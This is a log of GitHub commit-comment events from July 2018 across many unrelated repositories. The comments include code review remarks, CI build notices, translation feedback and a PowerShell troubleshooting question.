{"id":"7956107268","type":"CommitCommentEvent","actor":{"login":"chiraag-nataraj"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29684939,"position":null,"line":null,"path":null,"commit_id":"6108f459e375151e95bedf7090eb9b84169479e8","created_at":"2018-07-12T13:05:23Z","updated_at":"2018-07-12T13:05:23Z","author_association":"COLLABORATOR","body":"Yes, this is not ideal, but bdd4b026c4bb6a5d3c671574ab63c8e438d886ac doesn't solve the problem since even `**/.snapshots` will only block snapshots one level down (e.g. `/home/.snapshots` is not accessible, but `/home/<user>/.snapshots` is). If someone has a better way to block this using firejail exclusively, please go ahead and commit that (my globbing fu isn't that great)."}},"created_at":"2018-07-12T13:05:23Z"}
{"id":"7956108629","type":"CommitCommentEvent","actor":{"login":"joaomoreno"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29684945,"position":17,"line":57,"path":"src/vs/workbench/browser/parts/editor/sideBySideEditor.ts","commit_id":"4d0b3d025e935ebca55eee235e22504d2b6bb2f6","created_at":"2018-07-12T13:05:37Z","updated_at":"2018-07-12T13:05:37Z","author_association":"MEMBER","body":"@bpasero This broke: https://github.com/Microsoft/vscode/issues/54014#issuecomment-404150155\r\n\r\nAlso, `readonly` is much better in cases like this anyway, why change to a getter?"}},"created_at":"2018-07-12T13:05:37Z"}
{"id":"7956109473","type":"CommitCommentEvent","actor":{"login":"silviatosi"},"repo":{"name":"telerik/xaml-sdk"},"payload":{"comment":{"id":29684950,"position":null,"line":null,"path":null,"commit_id":"9c4bcb483ab85aaaacb0f67c5114f80d06e9c01c","created_at":"2018-07-12T13:05:46Z","updated_at":"2018-07-12T13:05:46Z","author_association":"NONE","body":"Hi, \r\nI am going to use this implementation to bind SelectedItems to my viewmodel.\r\nOne note: I need to initialize in the get of SELECTEDITEMS the collection. \r\nWhat if I would not initialize to anything ? I've noticed in this case the binding it's not working.\r\n\r\nThank you anyway for updating code"}},"created_at":"2018-07-12T13:05:46Z"}
{"id":"7956113802","type":"CommitCommentEvent","actor":{"login":"windsmasher"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29684955,"position":31,"line":31,"path":"src/Zad5.java","commit_id":"19d560b31e7c68426f3b93602a60098d2dd47e3c","created_at":"2018-07-12T13:06:33Z","updated_at":"2018-07-12T13:06:33Z","author_association":"OWNER","body":"bo lista zwraca mi obiekty, a ja chce sumować liczby do zmiennej \"suma\""}},"created_at":"2018-07-12T13:06:33Z"}
{"id":"7956122618","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29684972,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-12T13:08:10Z","updated_at":"2018-07-12T13:08:10Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T13:08:10Z"}
{"id":"7956125646","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29684977,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-12T13:08:43Z","updated_at":"2018-07-12T13:08:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T13:08:43Z"}
{"id":"7956128879","type":"CommitCommentEvent","actor":{"login":"djmax81"},"repo":{"name":"djmax81/MadMax_kernel_Universal8895"},"payload":{"comment":{"id":29684980,"position":null,"line":null,"path":null,"commit_id":"d6598dc1881af23516c79ca30eec9e924ba3c3d0","created_at":"2018-07-12T13:09:18Z","updated_at":"2018-07-12T13:09:18Z","author_association":"OWNER","body":"Cool bruh ! i'll add  valid author\n\nOn Thu, Jul 12, 2018, 6:18 PM Noxxxious <notifications@github.com> wrote:\n\n> git commit --amend --author=\"Noxxxious f.catzgerald@gmail.com\" or\n> @Noxxxious <https://github.com/Noxxxious>\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/djmax81/MadMax_kernel_Universal8895/commit/d6598dc1881af23516c79ca30eec9e924ba3c3d0#commitcomment-29684725>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEGKRue6o32_e0Vd914LU6IS8ekUiLiwks5uF0WugaJpZM4VMySv>\n> .\n>\n"}},"created_at":"2018-07-12T13:09:18Z"}
{"id":"7956130876","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29684985,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-12T13:09:41Z","updated_at":"2018-07-12T13:09:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T13:09:41Z"}
{"id":"7956133063","type":"CommitCommentEvent","actor":{"login":"windsmasher"},"repo":{"name":"windsmasher/CodeTasks"},"payload":{"comment":{"id":29684987,"position":21,"line":21,"path":"src/Zad6.java","commit_id":"aa2594a92d8a069dca45e41bc413ae3b4032607e","created_at":"2018-07-12T13:10:05Z","updated_at":"2018-07-12T13:10:05Z","author_association":"OWNER","body":"zrobiłem to specjalnie, bo wiem że jeśli jest jedno polecenie to ciało nie jest wymagane, ale lepiej zawsze używać ciała to ok, już zmieniłem"}},"created_at":"2018-07-12T13:10:05Z"}
{"id":"7956141708","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29685002,"position":null,"line":null,"path":null,"commit_id":"e87f28ce7bacf6624e49eed16db1db49a0c918dd","created_at":"2018-07-12T13:11:39Z","updated_at":"2018-07-12T13:11:39Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-131137 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-131137\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T13:11:39Z"}
{"id":"7956147057","type":"CommitCommentEvent","actor":{"login":"taki"},"repo":{"name":"taki/dotfiles"},"payload":{"comment":{"id":29685015,"position":null,"line":null,"path":null,"commit_id":"bb2077264441ee9a3630404646ecac703a4ce0ea","created_at":"2018-07-12T13:12:39Z","updated_at":"2018-07-12T13:12:39Z","author_association":"OWNER","body":"🐟 🐠 🍣 "}},"created_at":"2018-07-12T13:12:39Z"}
{"id":"7956148497","type":"CommitCommentEvent","actor":{"login":"jdm"},"repo":{"name":"servo/core-foundation-rs"},"payload":{"comment":{"id":29685017,"position":null,"line":null,"path":null,"commit_id":"02e5955e76e111f1e0953afaa3e5b14d5d3f92c6","created_at":"2018-07-12T13:12:54Z","updated_at":"2018-07-12T13:12:54Z","author_association":"MEMBER","body":"Published 0.11.0."}},"created_at":"2018-07-12T13:12:54Z"}
{"id":"7956155204","type":"CommitCommentEvent","actor":{"login":"mohmed1500"},"repo":{"name":"electron/libchromiumcontent"},"payload":{"comment":{"id":29685037,"position":null,"line":null,"path":null,"commit_id":"8a067a04b0e507e61bd6b1e4cdda6eb3df125a3d","created_at":"2018-07-12T13:14:07Z","updated_at":"2018-07-12T13:14:07Z","author_association":"NONE","body":"8a067a0"}},"created_at":"2018-07-12T13:14:07Z"}
{"id":"7956155309","type":"CommitCommentEvent","actor":{"login":"Stitch626"},"repo":{"name":"Stitch626/teeworlds-infclass"},"payload":{"comment":{"id":29685038,"position":null,"line":null,"path":null,"commit_id":"c455bdb817d989c87d070cc9030067e95fde1897","created_at":"2018-07-12T13:14:08Z","updated_at":"2018-07-12T13:14:08Z","author_association":"OWNER","body":"Please make sure you have bam 0.4 installed. Bam 0.5 won't work."}},"created_at":"2018-07-12T13:14:08Z"}
{"id":"7956162332","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29685057,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-12T13:15:25Z","updated_at":"2018-07-12T13:15:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T13:15:25Z"}
{"id":"7956167990","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29685073,"position":null,"line":null,"path":null,"commit_id":"cd1ae66616d5961ff944265701abbfa10f4ec09c","created_at":"2018-07-12T13:16:26Z","updated_at":"2018-07-12T13:16:26Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests - untagged [Build *.*.47.cd1ae66616d5961ff944265701abbfa10f4ec09c](http://build.palaso.org/viewLog.html?buildId=124676&buildTypeId=Glyssen_GlyssenPullRequestsUntagged) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:58"}},"created_at":"2018-07-12T13:16:26Z"}
{"id":"7956174070","type":"CommitCommentEvent","actor":{"login":"ZJUgreyhaters"},"repo":{"name":"ZJUgreyhaters/PAT"},"payload":{"comment":{"id":29685093,"position":null,"line":null,"path":null,"commit_id":"4c110f80c18f6307a72feefb49ceeb5b91d01bdf","created_at":"2018-07-12T13:17:31Z","updated_at":"2018-07-12T13:17:31Z","author_association":"OWNER","body":"Not AC"}},"created_at":"2018-07-12T13:17:31Z"}
{"id":"7956175936","type":"CommitCommentEvent","actor":{"login":"DJCrashdummy"},"repo":{"name":"PhilippC/keepass2android"},"payload":{"comment":{"id":29685095,"position":5,"line":361,"path":"src/keepass2android/Resources/values/strings.xml","commit_id":"c8a4978b5f99161f3611005814c2527ff076a11f","created_at":"2018-07-12T13:17:51Z","updated_at":"2018-07-12T13:17:51Z","author_association":"CONTRIBUTOR","body":"especially since you are NOT using the _remote databases_ i'd rather suggest something like:\r\n\"[...] This allows to use its data (at the state of last access) even when inaccessible.\" - not sure if the text in the bracket or something similar is really necessary."}},"created_at":"2018-07-12T13:17:51Z"}
{"id":"7956176899","type":"CommitCommentEvent","actor":{"login":"semihalf-ostruszka-andrzej"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29685098,"position":null,"line":null,"path":null,"commit_id":"5b23960f2834e91c6be30acc24a67aaa9829c612","created_at":"2018-07-12T13:18:01Z","updated_at":"2018-07-12T13:18:01Z","author_association":"NONE","body":"Yes, this is only needed for the \"owned\" p-ports.  BTW I have now rebased to match Marvell priv repo so now development is done on dpdk-18.02-armada-17.10-csb branch.  The last two commits on this branch are needed only for \"owned\" p-ports so if we want to put \"owned\" p-ports aside then I can keep it as a separate branch and reset dpdk-18.02-armada-17.10-csb to point before the last two commits."}},"created_at":"2018-07-12T13:18:01Z"}
{"id":"7956183381","type":"CommitCommentEvent","actor":{"login":"gtmanfred"},"repo":{"name":"saltstack/salt"},"payload":{"comment":{"id":29685112,"position":5,"line":143,"path":"salt/roster/ansible.py","commit_id":"d0e5515757c9265fb2a9104bf3d0ebdc07c4918b","created_at":"2018-07-12T13:19:12Z","updated_at":"2018-07-12T13:19:12Z","author_association":"MEMBER","body":"That is a good point, it is possible that these defaults could be multiple levels."}},"created_at":"2018-07-12T13:19:12Z"}
{"id":"7956183574","type":"CommitCommentEvent","actor":{"login":"DJCrashdummy"},"repo":{"name":"PhilippC/keepass2android"},"payload":{"comment":{"id":29685113,"position":7,"line":363,"path":"src/keepass2android/Resources/values/strings.xml","commit_id":"c8a4978b5f99161f3611005814c2527ff076a11f","created_at":"2018-07-12T13:19:14Z","updated_at":"2018-07-12T13:19:14Z","author_association":"CONTRIBUTOR","body":"i'm not sure, but to unify and clarify wording shouldn't from line 363 to 366 also be used \"internal backup/cache\" instead of \"local backup\"?"}},"created_at":"2018-07-12T13:19:14Z"}
{"id":"7956187962","type":"CommitCommentEvent","actor":{"login":"mora145"},"repo":{"name":"Ludeon/RimWorld-Spanish"},"payload":{"comment":{"id":29685122,"position":null,"line":null,"path":null,"commit_id":"a81ef599dc5cac6a20e85fa8a4d0a4d0a449827c","created_at":"2018-07-12T13:20:02Z","updated_at":"2018-07-12T13:20:02Z","author_association":"CONTRIBUTOR","body":"Saludos. Con todo respeto @colo13verdadeo debes tener cuidado a la hora de traducir. Hay varios errores graves de traducción en tu commit."}},"created_at":"2018-07-12T13:20:02Z"}
{"id":"7956190042","type":"CommitCommentEvent","actor":{"login":"mattpitkin"},"repo":{"name":"mattpitkin/yamm"},"payload":{"comment":{"id":29685125,"position":null,"line":null,"path":null,"commit_id":"24302de4a9b01be92d17e73ad19ebea6ec62e1f7","created_at":"2018-07-12T13:20:23Z","updated_at":"2018-07-12T13:20:23Z","author_association":"OWNER","body":"@Hauffo - I think [GWMCMC](https://github.com/grinsted/gwmcmc), which implements the same algorithm as yamm, might be worth trying out. It allows you to define your own prior function and pass it to the sampler."}},"created_at":"2018-07-12T13:20:23Z"}
{"id":"7956191393","type":"CommitCommentEvent","actor":{"login":"jebuskrust"},"repo":{"name":"gled-rs/mastodo"},"payload":{"comment":{"id":29685134,"position":null,"line":null,"path":null,"commit_id":"7c5c9ef567640473b21b5b661fb605918d6cc55a","created_at":"2018-07-12T13:20:37Z","updated_at":"2018-07-12T13:20:37Z","author_association":"NONE","body":"Woops merges are the best merges "}},"created_at":"2018-07-12T13:20:37Z"}
{"id":"7956195004","type":"CommitCommentEvent","actor":{"login":"veslav3"},"repo":{"name":"veslav3/git-tutorial"},"payload":{"comment":{"id":29685141,"position":null,"line":null,"path":null,"commit_id":"413c85c8b714b27a2e673cf82dfcf2e15b565faa","created_at":"2018-07-12T13:21:16Z","updated_at":"2018-07-12T13:21:16Z","author_association":"OWNER","body":"thatś cool RIda\r\n"}},"created_at":"2018-07-12T13:21:16Z"}
{"id":"7956195550","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29685146,"position":null,"line":null,"path":null,"commit_id":"4cb20e1f4ef95ce482046fda3d12f80835952cd8","created_at":"2018-07-12T13:21:22Z","updated_at":"2018-07-12T13:21:22Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-132121 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-132121\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T13:21:22Z"}
{"id":"7956199367","type":"CommitCommentEvent","actor":{"login":"YuryMatskevich"},"repo":{"name":"YuryMatskevich/ymatskevich"},"payload":{"comment":{"id":29685163,"position":5,"line":6,"path":"chapter_007/src/test/java/ru/job4j/crud/store/MemoryStoreCollectionTest.java","commit_id":"04bba44a7fd8a064107fa26ae363f55665dec397","created_at":"2018-07-12T13:22:03Z","updated_at":"2018-07-12T13:22:03Z","author_association":"OWNER","body":"Решение моей проблемы с запуском тестов."}},"created_at":"2018-07-12T13:22:03Z"}
{"id":"7956200386","type":"CommitCommentEvent","actor":{"login":"YuryMatskevich"},"repo":{"name":"YuryMatskevich/ymatskevich"},"payload":{"comment":{"id":29685164,"position":5,"line":9,"path":"chapter_007/src/test/java/ru/job4j/crud/validate/ValidateServiceInstanceTest.java","commit_id":"04bba44a7fd8a064107fa26ae363f55665dec397","created_at":"2018-07-12T13:22:14Z","updated_at":"2018-07-12T13:22:14Z","author_association":"OWNER","body":"Решение моей проблемы с запуском тестов."}},"created_at":"2018-07-12T13:22:14Z"}
{"id":"7956203215","type":"CommitCommentEvent","actor":{"login":"colo13verdadeo"},"repo":{"name":"Ludeon/RimWorld-Spanish"},"payload":{"comment":{"id":29685172,"position":null,"line":null,"path":null,"commit_id":"a81ef599dc5cac6a20e85fa8a4d0a4d0a449827c","created_at":"2018-07-12T13:22:44Z","updated_at":"2018-07-12T13:22:44Z","author_association":"CONTRIBUTOR","body":"Ah, dale perfecto, si me lo puedes aclarar mejor cuales son asi mejoro?"}},"created_at":"2018-07-12T13:22:44Z"}
{"id":"7956206373","type":"CommitCommentEvent","actor":{"login":"cmenkemeller"},"repo":{"name":"Justinlawrence102/rideTracker"},"payload":{"comment":{"id":29685176,"position":null,"line":null,"path":null,"commit_id":"5f47b5f02deda4e579c9f8c0c5e75c7a76cafc6d","created_at":"2018-07-12T13:23:17Z","updated_at":"2018-07-12T13:23:17Z","author_association":"NONE","body":"I can help with the wording on the New Attractions Added piece. I see it pops up on the attraction list screen. Does it only look at new Active attractions or does it pop up even if an extinct attraction is added?\r\n\r\nCan you get a count of how many attractions have been added? \r\n\r\nIf so then — “New Attractions Added: 1 new attraction(s) are now available."}},"created_at":"2018-07-12T13:23:17Z"}
{"id":"7956206862","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29685180,"position":null,"line":null,"path":null,"commit_id":"cd1ae66616d5961ff944265701abbfa10f4ec09c","created_at":"2018-07-12T13:23:22Z","updated_at":"2018-07-12T13:23:22Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.733.cd1ae66616d5961ff944265701abbfa10f4ec09c](http://build.palaso.org/viewLog.html?buildId=124677&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1872, ignored: 18 Build time: 00:07:49"}},"created_at":"2018-07-12T13:23:22Z"}
{"id":"7956211036","type":"CommitCommentEvent","actor":{"login":"semihalf-ostruszka-andrzej"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29685195,"position":null,"line":null,"path":null,"commit_id":"17771ccf9dd0bc651f094899861560b03efedbce","created_at":"2018-07-12T13:24:06Z","updated_at":"2018-07-12T13:24:06Z","author_association":"NONE","body":"I guess this one is not needed if you don't care about \"dynamic attach/detach\" (from the CLI of testpmd).  Without it when you try to start port after attaching from CLI in testpmd it will use rxmode without CRC stripping (even if you explicitly configure CRC stripping for port after attach) and this will cause mvneta to fail (because it requires it)."}},"created_at":"2018-07-12T13:24:06Z"}
{"id":"7956211540","type":"CommitCommentEvent","actor":{"login":"SujitChauhan"},"repo":{"name":"SujitChauhan/triadicweb"},"payload":{"comment":{"id":29685196,"position":null,"line":null,"path":null,"commit_id":"8a790c5feed63c0bb424fcd7a7725b595154b4fb","created_at":"2018-07-12T13:24:12Z","updated_at":"2018-07-12T13:24:12Z","author_association":"OWNER","body":"readme file updated"}},"created_at":"2018-07-12T13:24:12Z"}
{"id":"7956238468","type":"CommitCommentEvent","actor":{"login":"GodzillaUA"},"repo":{"name":"PolyacovYury/PYmods"},"payload":{"comment":{"id":29685260,"position":5,"line":52,"path":"source/scripts/client/gui/mods/mod_RemodEnabler/config.py","commit_id":"e662d7ac0066024bd6dc3c6b7eaae2a5cffd7858","created_at":"2018-07-12T13:28:45Z","updated_at":"2018-07-12T13:28:45Z","author_association":"NONE","body":"Re: [PolyacovYury/PYmods] PYmodsCore: 2.4.2. Cleaned hotkey read/write code (e662d7a)\n\n\nЗдравствуйте, PolyacovYury.\n\nВы писали 12 июля 2018 г., 15:57:57:\n\n\n\n\n\nI would be very grateful, if someone could explain to me, how the hell did this happen.\n—\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n\n\nЮр, как понимать сие послание? Смысл понятен... причина нет )\n\n--\nС уважением,\n Виталий                          mailto:kolwin@ukr.net"}},"created_at":"2018-07-12T13:28:45Z"}
{"id":"7956247664","type":"CommitCommentEvent","actor":{"login":"wiktor-k"},"repo":{"name":"openpgpjs/openpgpjs"},"payload":{"comment":{"id":29685275,"position":7,"line":1473,"path":"test/general/key.js","commit_id":"76f583902e69bb692d2605750c64dfb74c3a53fe","created_at":"2018-07-12T13:30:10Z","updated_at":"2018-07-12T13:30:10Z","author_association":"CONTRIBUTOR","body":"Oh, sorry about that, I'll try to keep the names clean next time :)"}},"created_at":"2018-07-12T13:30:10Z"}
{"id":"7956249510","type":"CommitCommentEvent","actor":{"login":"joye-ramone"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29685280,"position":20,"line":986,"path":"ogsr_engine/xrGame/WeaponMagazined.cpp","commit_id":"eaec6351222bf89c64e0d58e9911b231586446ed","created_at":"2018-07-12T13:30:25Z","updated_at":"2018-07-12T13:30:25Z","author_association":"CONTRIBUTOR","body":"Не, это мой провтык. Там должна быть секция оружия."}},"created_at":"2018-07-12T13:30:25Z"}
{"id":"7956249915","type":"CommitCommentEvent","actor":{"login":"Ib-R"},"repo":{"name":"Ib-R/chat"},"payload":{"comment":{"id":29685281,"position":null,"line":null,"path":null,"commit_id":"1a7f3e10d9dc20a511d9027fc4113cd4f8daf581","created_at":"2018-07-12T13:30:29Z","updated_at":"2018-07-12T13:30:29Z","author_association":"OWNER","body":"Delete CNAME"}},"created_at":"2018-07-12T13:30:29Z"}
{"id":"7956259733","type":"CommitCommentEvent","actor":{"login":"yvesgermain"},"repo":{"name":"SNikalaichyk/cNtfsAccessControl"},"payload":{"comment":{"id":29685306,"position":null,"line":null,"path":null,"commit_id":"80c7c783843273297b18bc4e14ee3e21857b19ce","created_at":"2018-07-12T13:31:57Z","updated_at":"2018-07-12T13:31:57Z","author_association":"NONE","body":"Can you give an example of using CntfsPermissions with Invoke-dscresource?\r\nPS C:\\> invoke-dscresource -ModuleName cNtfsAccessControl -Name cNtfsPermissionEntry -Method get -Property @{Ensure = 'Present' ;Principal  = \"server\\user\"; Path= 'D:\\InetPub\\' ; AccessControlInformation = @(cNtfsAccessControlInformation { AccessControlType  = 'Allow';FileSystemRights = 'Modify';Inheritance = 'SubfoldersAndFilesOnly';NoPropagateInherit = $false})}\r\n \r\nI keep getting an error message:\r\ncNtfsAccessControlInformation : Le terme «cNtfsAccessControlInformation» n'est pas reconnu comme nom d'applet de commande, fonction, fichier de script ou programme exécutable. Vérifiez l'orthographe du nom, ou si un chemin d'accès existe, vérifiez que le chemin d'accès est correct et réessayez.\r\nAu caractère Ligne:1 : 207\r\n+ ...  ; AccessControlInformation = @(cNtfsAccessControlInformation { Acces ...\r\n+                                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n    + CategoryInfo          : ObjectNotFound: (cNtfsAccessControlInformation:String) [], CommandNotFoundException\r\n    + FullyQualifiedErrorId : CommandNotFoundException\r\n\r\ninvoke-dscresource : Échec de la sérialisation des propriétés dans CimInstance.\r\nAu caractère Ligne:1 : 1\r\n+ invoke-dscresource -ModuleName cNtfsAccessControl -Name cNtfsPermissi ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n    + CategoryInfo          : NotSpecified: (:) [Invoke-DscResource], SerializationException\r\n    + FullyQualifiedErrorId : System.Runtime.Serialization.SerializationException,Microsoft.PowerShell.DesiredStateConfiguration.Commands.InvokeDscResourceMethodCommand\r\n\r\n### PS C:\\> $PSVersionTable\r\n\r\nName                           Value\r\n----                           -----\r\nPSVersion                      5.1.14409.1012\r\nPSEdition                      Desktop\r\nPSCompatibleVersions           {1.0, 2.0, 3.0, 4.0...}\r\nBuildVersion                   10.0.14409.1012\r\nCLRVersion                     4.0.30319.42000\r\nWSManStackVersion              3.0\r\nPSRemotingProtocolVersion      2.3\r\nSerializationVersion           1.1.0.1\r\n"}},"created_at":"2018-07-12T13:31:57Z"}
{"id":"7956263613","type":"CommitCommentEvent","actor":{"login":"landaisbenj"},"repo":{"name":"EdddieN/machinon-domoticz_theme"},"payload":{"comment":{"id":29685319,"position":null,"line":null,"path":null,"commit_id":"4dea279e80542462e44624f10123965d69ed5e4c","created_at":"2018-07-12T13:32:32Z","updated_at":"2018-07-12T13:32:32Z","author_association":"CONTRIBUTOR","body":"If you want 😊 the goal si the same. And your idea begin for your project. But yes made by domoticz community is good 👍🏻\r\n\r\nBenjamin\r\n\r\nEnvoyé de mon iPhone\r\n\r\nLe 12 juil. 2018 à 13:45, Ed <notifications@github.com<mailto:notifications@github.com>> a écrit :\r\n\r\n\r\nGuys, you are doing a lot of work too. I cannot take the credit alone... can we at least change it to something more like designed by EdddieN, made possible by Domoticz community or even yourselves?\r\n\r\n—\r\nYou are receiving this because you are subscribed to this thread.\r\nReply to this email directly, view it on GitHub<https://github.com/EdddieN/machinon-domoticz_theme/commit/4dea279e80542462e44624f10123965d69ed5e4c#commitcomment-29684066>, or mute the thread<https://github.com/notifications/unsubscribe-auth/Aep8L1Of3IkOeY6vfWoR75Z7Bg4dkiaIks5uFzbkgaJpZM4VMsqN>.\r\n"}},"created_at":"2018-07-12T13:32:32Z"}
{"id":"7956273608","type":"CommitCommentEvent","actor":{"login":"Mil0dV"},"repo":{"name":"Mil0dV/co2ok-plugin-woocommerce"},"payload":{"comment":{"id":29685340,"position":20,"line":308,"path":"co2ok-plugin.php","commit_id":"3a7e6d9b77b99eb167f35de389fff99b4976e831","created_at":"2018-07-12T13:34:15Z","updated_at":"2018-07-12T13:34:15Z","author_association":"OWNER","body":"*the percentage isn't negative"}},"created_at":"2018-07-12T13:34:15Z"}
